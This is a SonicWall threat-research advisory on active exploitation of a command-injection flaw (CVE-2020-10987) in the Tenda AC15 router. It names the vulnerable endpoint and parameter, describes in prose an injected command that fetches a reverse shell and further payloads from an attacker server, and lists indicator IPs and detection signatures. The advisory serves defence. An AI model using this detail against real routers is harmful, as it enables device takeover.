Security News

Attackers actively targeting Tenda WiFi router vulnerability

By
SonicWall Capture Labs Threat Research team observes attackers actively exploiting the  arbitrary remote code execution vulnerability reported in Tenda AC15 router. Tenda AC15 AC1900AC15 is an AC1900 Smart Dual-band Gigabit Wi-Fi Router designed for smart home networking life.

CVE-2020–10987 | Vulnerability:

The goform/setUsbUnload endpoint of Tenda AC15 AC1900 version 15.03.05.19 allows remote attackers to execute arbitrary system commands via the deviceName parameter. This vulnerability is due to improper validation of the input parameter deviceName and this value is directly passed to a doSystemCmd function, causing an arbitrary command execution.

Exploit:

In the below exploit request that was captured, the attacker passes the malicious shellcode through the deviceName parameter, allowing arbitrary code execution.

This command downloads a reverse shell to the temp directory and executes it

When usb.sh is executed, it downloads more payloads from the attacker server 5.252.194.29 and executes them one by one.

Trend Chart:

IOC:

185.39.11.105
5.252.194.29

SonicWall Capture Labs Threat Research team provides protection against this exploit with the following signatures:

IPS: 13634 Suspicious Request URI 17
IPS: 5811 Web Application Suspicious File Upload 1 -c2
IPS: 3141 Web Application Suspicious File Upload 11
IPS: 15028 Web Application Suspicious File Upload 18

 

Security News
The SonicWall Capture Labs Threat Research Team gathers, analyzes and vets cross-vector threat information from the SonicWall Capture Threat network, consisting of global devices and resources, including more than 1 million security sensors in nearly 200 countries and territories. The research team identifies, analyzes, and mitigates critical vulnerabilities and malware daily through in-depth research, which drives protection for all SonicWall customers. In addition to safeguarding networks globally, the research team supports the larger threat intelligence community by releasing weekly deep technical analyses of the most critical threats to small businesses, providing critical knowledge that defenders need to protect their networks.
Recommended Cyber Security Stories
Fake Chinese Word Processing App installs an Infostealer Trojan
Malware switches users Bank Account Number with that of the attacker (October 25, 2013)
Trojan uses Rootkit remover tool to disable Anti-virus (Dec 1, 2011)
Tedroo Spam Trojan (Mar 11, 2011)
Delphi based bot with DDoS capabilities (March 15, 2013)
Yet another Toll Fraud malware for Android (January 11, 2013)
Two more Flash 0-days as a result of HackingTeam data leak
Waledac SMS Spy Trojan (April 16, 2009)